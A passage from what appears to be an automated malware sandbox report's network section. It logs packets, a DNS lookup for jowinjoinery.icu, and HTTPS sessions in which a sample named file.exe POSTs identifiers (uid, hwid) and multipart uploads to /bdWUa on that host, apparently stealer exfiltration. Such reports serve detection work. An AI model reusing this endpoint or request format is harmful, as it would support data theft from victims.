Mar 10, 2025 21:05:15.741967916 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:15.752566099 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:15.752584934 CET	443	49715	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:15.752922058 CET	443	49715	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:15.754632950 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:15.754882097 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:15.754908085 CET	443	49715	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:15.754995108 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:15.755002022 CET	443	49715	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:16.693027020 CET	443	49715	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:16.693368912 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:17.001061916 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:17.001110077 CET	443	49716	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:17.001205921 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:17.001635075 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:17.001647949 CET	443	49716	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:18.783200026 CET	443	49716	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:18.783284903 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:18.786231041 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:18.786243916 CET	443	49716	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:18.786462069 CET	443	49716	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:18.787863970 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:18.788003922 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:18.788053989 CET	443	49716	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:19.972203970 CET	443	49716	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:19.972546101 CET	49716	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:20.767318964 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:20.767370939 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:20.767442942 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:20.767843962 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:20.767858982 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.635689020 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.636182070 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.637310982 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.637331963 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.637614965 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.687632084 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.709105968 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.709105968 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.709259987 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.709414959 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.709475040 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.709749937 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.709979057 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.710416079 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.710448027 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.710659027 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.710700989 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.712620020 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.712651968 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.712670088 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.712739944 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.712846041 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.712891102 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.712982893 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.717205048 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.717242002 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.717284918 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.717299938 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.717354059 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.717359066 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.717396975 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.717479944 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:22.717514992 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:22.717556000 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:26.155155897 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:26.155313015 CET	443	49717	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:26.155443907 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:26.155468941 CET	49717	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:26.259218931 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:26.259279966 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:26.259891987 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:26.260287046 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:26.260302067 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.038204908 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.038363934 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:28.039824963 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:28.039850950 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.040117025 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.041418076 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:28.041450024 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:28.041496038 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.798938036 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.801923990 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.801989079 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:28.802074909 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:28.802095890 CET	443	49718	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:28.802109003 CET	49718	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:28.802114964 CET	443	49718	188.114.97.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 21:04:45.013355017 CET	50343	53	192.168.2.5	1.1.1.1
Mar 10, 2025 21:04:45.025105000 CET	53	50343	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 10, 2025 21:04:45.013355017 CET	192.168.2.5	1.1.1.1	0xf1b8	Standard query (0)	jowinjoinery.icu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 10, 2025 21:04:45.025105000 CET	1.1.1.1	192.168.2.5	0xf1b8	No error (0)	jowinjoinery.icu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 10, 2025 21:04:45.025105000 CET	1.1.1.1	192.168.2.5	0xf1b8	No error (0)	jowinjoinery.icu		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jowinjoinery.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	188.114.97.3	443	8384	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:04:46 UTC	266	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: jowinjoinery.icu
2025-03-10 20:04:46 UTC	49	OUT	Data Raw: 75 69 64 3d 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 26 63 69 64 3d Data Ascii: uid=926e8c517364f11da70baa0a46e427522f26cc6d&cid=
2025-03-10 20:05:07 UTC	786	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:05:06 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAvGpAhUfdS8FdzlQMn%2FBzXEwQBNIeo9kWOUxPh5MI4nK1iqicLw6hgljeh%2BnpUeAo6gBipyS5Q4WNRaMjKqjSF72VQxKTkgaC3Zw%2Bk6x4rhmvVScPcPpEq9BO5FN%2FABbFT4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56c51bc3bc948-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27169&min_rtt=5601&rtt_var=17425&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=951&delivery_rate=484038&cwnd=235&unsent_bytes=0&cid=ada95db410b2220c&ts=20432&x=0"
2025-03-10 20:05:07 UTC	583	IN	Data Raw: 82 b4 f7 53 41 30 76 cc 52 26 33 fa 2f 29 21 e2 20 a7 7e 14 8e 53 19 94 1d 57 fc ea 01 57 7f e3 e2 80 7e 03 9d 81 2c 94 67 7b 3e fa 1e d6 b8 e9 6b 11 c7 a3 7d 8d 64 d8 96 06 fb 96 c6 03 64 fd 77 98 9f 1a f8 cf 90 f3 60 fa a4 8d e5 20 41 e9 49 4c 48 8f ad f0 d6 dc 20 2c be f3 48 ab 74 45 ab 96 a1 23 f9 18 18 57 30 f5 74 0c bb a7 88 41 b5 05 95 0c 71 36 ac 05 c9 c7 0b db 23 74 17 e2 a2 5d e8 b4 cb a4 25 e5 6c 89 61 e7 91 d7 c3 2e 44 71 97 86 fe 4c 04 de da 6d 86 88 de 60 1a b9 89 81 f6 85 0a 23 cd 5d 2e ba ae ae 8d 01 f5 ff 89 7f 37 aa dd 45 64 36 44 4c c1 7e 29 87 fd 15 ee d6 e8 2f ec 4c 90 7b 2a b7 59 7f e7 fd 64 ed 38 5f 7c 6f d5 33 14 8c 24 df 09 31 ff 9e 95 20 c6 62 87 ab de 28 d0 2b f2 d1 3a 24 59 ff f1 ed 52 4c 10 70 8d 2e 7c 5f e3 dc 94 b6 2b b1 f1 Data Ascii: SA0vR&3/)! ~SWW~,g{>k}ddw` AILH ,HtE#W0tAq6#t]%la.DqLm`#].7Ed6DL~)/L{*Yd8_\|o3$1 b(+:$YRLp.\|_+
2025-03-10 20:05:07 UTC	1369	IN	Data Raw: 80 ef e7 92 2d 7a a0 99 15 84 55 20 42 e8 53 7f b6 29 3c 9c 64 fd a0 df 81 42 32 46 b3 0c dd 35 d5 a2 43 ea 3b 69 d2 6c 98 3f ea 3d f7 f8 a3 53 72 75 db f9 98 0b 89 13 bc 3d 3a e0 f1 8b 95 13 11 3a e8 63 0f 09 50 7f 8a 60 6a 47 ee 1d 6b 95 74 ef 02 fc 0c 0d 41 14 b9 80 35 76 0e fe b9 07 2b 61 0b 6a d2 5c 50 b1 d3 67 f6 f9 c4 e2 80 15 8a f0 2c 18 77 c3 19 f2 17 0e b4 48 40 d1 56 f1 a2 ce 49 ad 12 7d cf 5d 82 c0 84 0c f1 b2 a9 8b 11 33 11 29 27 dc 46 67 8a 3e 3e 3f 76 9b c2 e9 45 30 c1 e5 81 64 0c 49 89 d4 8f 3a bd 3b 3b d0 dc 36 15 e3 6f a9 24 2c a7 6b 14 9f d5 51 f5 15 fc 53 bf d7 f4 ee ab db 20 70 9c 8c fe 8f 1d 0a 95 d8 23 64 1e 82 6d ff 87 93 3b b3 90 7f 4e d3 b2 99 71 49 5f 32 49 3e ed 3f bd 9b 1e 74 f6 20 5a 19 50 ef 9b b1 95 05 56 56 75 56 0b f4 b1 Data Ascii: -zU BS)<dB2F5C;il?=Sru=::cP`jGktA5v+aj\Pg,wH@VI}]3)'Fg>>?vE0dI:;;6o$,kQS p#dm;NqI_2I>?t ZPVVuV
2025-03-10 20:05:07 UTC	770	IN	Data Raw: 5b 8d 28 c3 f5 07 4d 00 0f fc 34 1e a9 40 d9 15 54 a7 8c 77 72 7e 2a 72 77 3a 7f af c8 6c 03 b5 9b 27 f0 5d d5 8c f8 b9 a6 4f bd b4 92 f1 7b 03 24 ac 9a e9 3d a5 ff c6 fe 01 cd 5e 76 71 0a f9 b3 1e ef bd 41 da ae 17 7d 9d 12 3f 82 d3 e5 c0 c6 9b 9f fd 3f 42 c2 ee af 63 08 75 9b 18 b1 a8 c3 14 24 6c 55 4f f2 69 d6 ac f3 86 fb ec 4c 1a 95 98 9b 41 d8 11 c7 e1 74 a4 f2 3c 13 dc 87 53 36 94 8b a3 7b fd b6 5c b0 8f 7a 52 38 cb 39 0f 05 4e 5b 5d 86 83 34 ae dc 5e 06 15 8d 2a 10 cd c1 ec de 96 6e 09 d1 d6 00 ec a5 a5 ae 94 aa a3 c9 3b f0 f2 98 71 8a 3b f0 0d 0b e1 0f ea f2 cd fb 3a b2 ea 6d 98 28 d6 9b bf 89 bc b5 ba 6f 03 d5 57 7b 1d 34 de ce 6d a9 13 d5 87 f4 1f 51 42 2f 89 b7 1a 49 89 4a 5f 81 5e bd 3c 45 e9 a8 3a de 9f 0d 4c 4e 73 03 8f ee ad 62 20 1a b0 fd Data Ascii: [(M4@Twr~rw:l']O{$=^vqA}??Bcu$lUOiLAt<S6{\zR89N[]4^n;q;:m(oW{4mQB/IJ_^<E:LNsb
2025-03-10 20:05:07 UTC	1369	IN	Data Raw: 80 f8 eb d6 6d 5e 5b 21 ea 5a ae 3b 60 59 0d 67 da a1 fd d8 6b 0d 4f 0d ab 8d e9 41 fa a3 f7 67 96 c7 65 24 50 9f 50 4e fe 99 31 17 82 b9 40 85 d5 d1 cb ee ea 6c fb 56 ec 99 12 ad 4e ce e6 d4 1d 4f 64 2d 8d 7f 3c 62 b8 80 c9 c0 cd 11 19 00 f4 ec bc a8 9b 9c 49 08 11 72 7e a0 ba 44 69 5b 35 99 d7 ed 92 4e 9f 7a 86 00 26 f1 66 bd e8 8d 77 f5 f1 15 cc 52 29 cc e4 33 6a 2a 07 2b f1 69 ad 60 fe 7a d9 8e 91 ed 61 f0 68 bb 5b 2a 50 ae f8 37 92 80 f5 18 0d 2a cf 80 17 f1 3b 34 40 0b e5 bc a5 67 3b 30 8c 5b d6 97 94 28 06 05 89 03 d4 6b 15 de 9b 85 d5 f6 30 61 28 29 6e 2e 3e b8 b8 7a f0 3d 1c ec 55 3f 2a b4 94 11 50 c6 79 f2 e0 69 48 d2 05 01 ef f1 aa e0 cb ba e3 17 09 18 78 a4 e6 7f 19 38 dd 67 36 73 1e 23 db e3 4a 60 8e 34 7f fd 65 30 70 ba 32 8d 53 f3 c9 19 de Data Ascii: m^[!Z;`YgkOAge$PPN1@lVNOd-<bIr~Di[5Nz&fwR)3j+i`zah[P7;4@g;0[(k0a()n.>z=U?PyiHx8g6s#J`4e0p2S
2025-03-10 20:05:07 UTC	1369	IN	Data Raw: d1 38 6c c1 f6 26 22 bf 8f 74 1b 01 92 ec ec 8c 7a 29 d0 ea db 3a 4c 7d 92 92 0e 12 32 a9 63 de 6a e4 35 40 bf cc 18 6d 31 e5 67 df 5f b0 7d 90 54 65 a0 79 fd b4 31 1d e1 d1 de 2b 49 58 8f ef 67 4f df 61 d6 de 34 a2 bd 6e 0f c4 a5 32 b0 d6 5b 43 3e ef 76 85 ee 10 1b 8f d6 aa 0d 4d 2b e1 8e 08 5a 74 4c 3d c0 78 0a cc 89 80 14 6f 6b 43 f8 13 6a 74 3f 8d 49 56 a9 0e 70 b4 40 a2 d5 d7 f6 8d 87 6a b9 97 cf 59 7d 41 dc 44 ad a5 9e cb 7d 93 1e c4 c4 b0 c8 e3 94 c7 8e 86 e6 e9 88 3e 38 a8 3a ab 14 9a 01 a3 fe be 2c f7 be 4c ea 82 12 9e a8 91 a3 3b 48 2d 2f 4a 1e 87 fe 6e df e3 57 88 d8 69 b6 53 3b 37 2d 7f 32 d9 81 8e a9 c1 1c dc 30 a2 94 69 07 80 c7 8b ec 10 01 dc 98 ad 30 ca e4 cb bc 3b f3 f1 a1 22 ca a6 2f 33 83 e9 b2 1f 6d 81 cc 74 c5 8d 74 5c 00 95 d9 db ba Data Ascii: 8l&"tz):L}2cj5@m1g_}Tey1+IXgOa4n2[C>vM+ZtL=xokCjt?IVp@jY}AD}>8:,L;H-/JnWiS;7-20i0;"/3mtt\
2025-03-10 20:05:07 UTC	1369	IN	Data Raw: 1f e0 d4 c3 9c 19 22 15 16 26 37 26 ea f5 e6 70 58 60 18 49 ea a2 b6 94 68 46 0c 67 08 fa d6 08 bb f5 7d 2a 19 6a 37 f2 a4 64 d1 85 63 e1 64 a7 34 fb 19 b6 78 4a 41 85 9f 47 05 a7 eb 80 dc de a3 2e b3 04 d8 ea 8b 84 88 18 e4 67 46 5b 53 0e ca 91 fe 2f 3d 99 00 ec f9 f8 ea 11 2f a7 be e9 05 83 c4 43 57 ed 38 06 9a bb 42 13 4a fd f7 86 8d 4c 1e f6 8e 1b 4e f6 2f dc a4 52 0a f8 6c 0e 60 35 f6 67 df 11 d2 ca 75 e2 e8 3e ca 45 52 b7 1b 46 91 ab 1f be 27 f0 34 f4 1f 34 ce 93 fe 4b 60 b2 21 7f 61 55 9d 0b 0a 7d a2 1d b4 77 05 b2 88 7a 17 7e 0e 91 74 a3 68 7a 89 78 db 55 1b e1 b2 07 f2 cc 5e 5a 41 78 45 6e 63 12 4c 2e eb ac ca f1 7f 27 75 d0 a1 24 3d fc d7 cf dc e7 bd af 65 e8 44 70 8f 20 87 91 61 88 4f 4a bf 55 c9 16 7d d2 fd 9b 43 00 cf 22 33 80 8c 25 8c 92 14 Data Ascii: "&7&pX`IhFg}*j7dcd4xJAG.gF[S/=/CW8BJLN/Rl`5gu>ERF'44K`!aU}wz~thzxU^ZAxEncL.'u$=eDp aOJU}C"3%
2025-03-10 20:05:07 UTC	1369	IN	Data Raw: 41 30 0f c7 4c aa 47 03 30 b6 7f 8e 90 21 34 20 df 72 75 88 c7 26 c6 0e 40 ec b3 2f 1b 8a 0b f7 58 f8 7f e4 f3 a5 1f 48 6f 1b 41 82 6d 2c 7d 30 8f 01 54 15 d0 ae 37 76 45 90 95 c2 13 f9 51 af 97 a2 5e 2b 1d 24 09 0f ee bb 20 4d dc 8d d0 85 18 c0 a9 70 59 06 60 9f fd c5 1b c2 f4 4d 20 b7 9c ab ca 42 f5 f5 e3 a0 96 78 e4 4a e8 73 d1 95 72 30 1b 50 bb f6 f2 58 3e 50 6c d0 67 c6 a4 de e8 60 7f f6 08 39 f3 c4 2b 61 3e 07 cb a2 27 2e f5 4b b8 1f 65 be e3 1d 9f 4a f8 6b a1 66 af 20 62 22 8f 56 ad 95 b8 92 0a b4 27 ac dc ae 80 ac a6 8f 8a d0 b4 5e 7b 87 f5 75 b1 46 da 74 b9 01 f1 7e de c9 8b 24 a5 e5 10 e0 1d ec fd 8d 62 88 a7 8a 0d 1b 93 d2 ef 63 c8 5f 90 7a 26 50 60 1a 43 62 61 c4 83 b8 55 11 87 a0 9f a8 bc 15 37 f6 ae fb 55 57 be 75 d5 c3 cf 7b a4 81 25 5e 2b Data Ascii: A0LG0!4 ru&@/XHoAm,}0T7vEQ^+$ MpY`M BxJsr0PX>Plg`9+a>'.KeJkf b"V'^{uFt~$bc_z&P`CbaU7UWu{%^+
2025-03-10 20:05:07 UTC	1369	IN	Data Raw: b5 24 2e 08 09 a6 03 90 f5 01 2b 23 56 70 bd 90 18 38 a9 5b 49 df 7e bd 8a cd 78 31 d1 af 4a 3e 2b ce c0 e2 94 39 28 e9 f0 03 32 18 9c 69 3a 38 6e 16 48 a8 f7 27 bb ea 9b e3 3b cf c7 a6 28 ec 93 94 69 e2 9a 03 c6 d8 81 ea 99 c1 0c 1e 3a 5e 50 94 4f ed 74 48 4b 75 e1 bd 6e e7 17 8f 3c 37 0b 53 a1 28 13 65 9a 5a 4e 12 55 34 8d 4a d7 71 8d bf c8 d9 67 56 96 82 ed e4 82 58 2b 5c 5c dc 66 44 ff 74 b4 e5 45 d6 b6 f6 3c e8 2c 5c 3a 3a b8 48 af 7e d5 5f 43 7c 2c 28 97 94 82 8c 4e c6 db 12 4c d3 b1 a9 89 32 96 b7 e9 27 7b 6d 89 44 8a 53 67 6f e4 57 d9 23 4d 00 e7 41 98 0d e2 e5 33 2c c4 3b d8 4c d8 1e 54 a5 97 50 a5 de 4f 77 c7 a2 4f 10 e7 3a ec 8f 44 d1 27 db 63 e2 76 5b 76 d4 d5 07 41 9c d6 a8 f6 45 bf 09 bb 94 d6 99 59 85 a4 83 f0 29 9b a7 d4 26 3b 73 26 44 c6 Data Ascii: $.+#Vp8[I~x1J>+9(2i:8nH';(i:^POtHKun<7S(eZNU4JqgVX+\\fDtE<,\::H~_C\|,(NL2'{mDSgoW#MA3,;LTPOwO:D'cv[vAEY)&;s&D
2025-03-10 20:05:07 UTC	1369	IN	Data Raw: bf d9 1b 4e 9e 32 62 6d c2 3b b2 a7 db 15 1c 5b b3 29 b5 ec 08 ea d0 a9 8c c8 73 b1 ca 9e 01 a2 09 63 d1 66 7c 6f 32 30 69 5b 98 db a8 83 fe 2a 3f 83 d7 45 04 11 5b 6d 61 fa b1 6b 4c 3d 41 d9 a2 ab 2c f7 9d f1 ef 76 a0 13 fd b7 fb 00 c1 1a 4d 67 cd b5 9f 44 2c 11 d5 eb 6b 2e 54 d9 db 9f 0c 59 ed ce 19 97 13 3f e4 41 4d 3a e0 7c a0 16 a7 fb 32 c5 4d 16 10 2b 5e 64 e4 39 c7 a9 55 71 51 90 72 68 5d 70 fc cf 4f 50 69 e4 71 03 e6 bd 7d b6 c6 86 a0 93 83 46 f7 53 45 88 0d 2d 87 66 8c b2 c2 15 4b 6a f7 ec c3 31 eb 9a 9a b2 01 c8 fc b4 8a 33 6c 34 d0 31 ce 19 42 8b dc de 56 54 23 e2 ac 14 5e 78 10 5f f1 ae 30 a6 ee 00 e0 c4 08 29 60 bb aa ba ed 4d c2 88 64 db 50 ab 2a b8 cd ce 63 ae 98 d1 fc 17 03 6d d9 d4 b1 98 a8 33 b2 e1 1d 21 ce ed df 33 c1 50 12 b4 a6 59 ef Data Ascii: N2bm;[)scf\|o20i[?E[makL=A,vMgD,k.TY?AM:\|2M+^d9UqQrh]pOPiq}FSE-fKj13l41BVT#^x_0)`MdPcm3!3PY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	188.114.97.3	443	8384	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:05:09 UTC	276	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ClI3W3kzbX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14881 Host: jowinjoinery.icu
2025-03-10 20:05:09 UTC	14881	OUT	Data Raw: 2d 2d 43 6c 49 33 57 33 6b 7a 62 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 43 6c 49 33 57 33 6b 7a 62 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 6c 49 33 57 33 6b 7a 62 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45 33 45 44 43 45 41 37 37 38 33 36 38 Data Ascii: --ClI3W3kzbXContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--ClI3W3kzbXContent-Disposition: form-data; name="pid"2--ClI3W3kzbXContent-Disposition: form-data; name="hwid"D930444CEA5EF217E3EDCEA778368
2025-03-10 20:05:10 UTC	811	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:05:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JW7RXuc1N4ZXlLFlaTO6dAawruQTULaS05vQtw3347yw94RmSoWavwZOQyNsM59GS5RZkP2txFcS9J5dbg67HSO3bpkCMT5qg%2Bb5C75gFo2YpfgEtr9mJZ%2FVJRDFXY4H2heg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56cdeac51e604-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9985&min_rtt=3887&rtt_var=11671&sent=12&recv=21&lost=0&retrans=1&sent_bytes=4232&recv_bytes=15815&delivery_rate=97148&cwnd=251&unsent_bytes=0&cid=4bcda8e066a971a4&ts=1119&x=0"
2025-03-10 20:05:10 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	188.114.97.3	443	8384	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:05:12 UTC	283	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=T65RXqd8bKyh522r7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15065 Host: jowinjoinery.icu
2025-03-10 20:05:12 UTC	15065	OUT	Data Raw: 2d 2d 54 36 35 52 58 71 64 38 62 4b 79 68 35 32 32 72 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 54 36 35 52 58 71 64 38 62 4b 79 68 35 32 32 72 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 36 35 52 58 71 64 38 62 4b 79 68 35 32 32 72 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43 Data Ascii: --T65RXqd8bKyh522r7Content-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--T65RXqd8bKyh522r7Content-Disposition: 